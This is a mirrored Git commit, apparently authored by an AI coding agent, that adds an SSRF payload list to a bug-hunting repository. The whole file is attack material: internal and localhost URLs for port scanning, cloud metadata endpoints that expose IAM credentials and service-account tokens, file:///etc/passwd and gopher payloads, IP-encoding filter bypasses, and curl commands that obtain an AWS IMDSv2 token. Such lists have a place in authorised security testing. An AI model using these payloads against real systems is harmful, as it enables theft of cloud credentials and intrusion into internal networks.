mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
Add comprehensive OWASP Top 10 directory structure with injection payloads
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
@@ -0,0 +1,85 @@
|
||||
# SSRF (Server-Side Request Forgery) Payloads
|
||||
|
||||
# Basic SSRF
|
||||
http://127.0.0.1
|
||||
http://localhost
|
||||
http://0.0.0.0
|
||||
http://[::1]
|
||||
http://[::]
|
||||
|
||||
# Port scanning
|
||||
http://127.0.0.1:22
|
||||
http://127.0.0.1:80
|
||||
http://127.0.0.1:443
|
||||
http://127.0.0.1:3306
|
||||
http://127.0.0.1:5432
|
||||
http://127.0.0.1:6379
|
||||
http://127.0.0.1:8080
|
||||
http://127.0.0.1:27017
|
||||
|
||||
# Cloud metadata endpoints
|
||||
# AWS
|
||||
http://169.254.169.254/latest/meta-data/
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||||
http://169.254.169.254/latest/user-data/
|
||||
|
||||
# Google Cloud
|
||||
http://metadata.google.internal/computeMetadata/v1/
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
|
||||
|
||||
# Azure
|
||||
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
||||
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
|
||||
|
||||
# Digital Ocean
|
||||
http://169.254.169.254/metadata/v1/
|
||||
http://169.254.169.254/metadata/v1/id
|
||||
|
||||
# Internal network scanning
|
||||
http://192.168.0.1
|
||||
http://192.168.1.1
|
||||
http://10.0.0.1
|
||||
http://172.16.0.1
|
||||
|
||||
# Protocol handlers
|
||||
file:///etc/passwd
|
||||
file:///c:/windows/win.ini
|
||||
dict://127.0.0.1:11211/
|
||||
gopher://127.0.0.1:6379/_INFO
|
||||
ldap://127.0.0.1:389
|
||||
tftp://127.0.0.1:69
|
||||
|
||||
# Bypassing filters
|
||||
# Using decimal IP
|
||||
http://2130706433 (127.0.0.1)
|
||||
http://3232235521 (192.168.0.1)
|
||||
|
||||
# Using octal IP
|
||||
http://0177.0.0.1
|
||||
http://0x7f.0x0.0x0.0x1
|
||||
|
||||
# Using hex IP
|
||||
http://0x7f000001
|
||||
http://0x7f.0x0.0x0.0x1
|
||||
|
||||
# DNS rebinding
|
||||
http://spoofed.burpcollaborator.net
|
||||
|
||||
# URL encoding
|
||||
http://127.0.0.1%23@example.com
|
||||
http://example.com@127.0.0.1
|
||||
http://127.0.0.1%00.example.com
|
||||
http://127.0.0.1%2f%2f@example.com
|
||||
|
||||
# IPv6 localhost
|
||||
http://[::1]
|
||||
http://[0:0:0:0:0:0:0:1]
|
||||
http://[0000:0000:0000:0000:0000:0000:0000:0001]
|
||||
|
||||
# Redirect-based SSRF
|
||||
http://redirect.example.com?url=http://127.0.0.1
|
||||
|
||||
# AWS IMDSv2 (requires token)
|
||||
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
|
||||
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
|
||||
Reference in New Issue
Block a user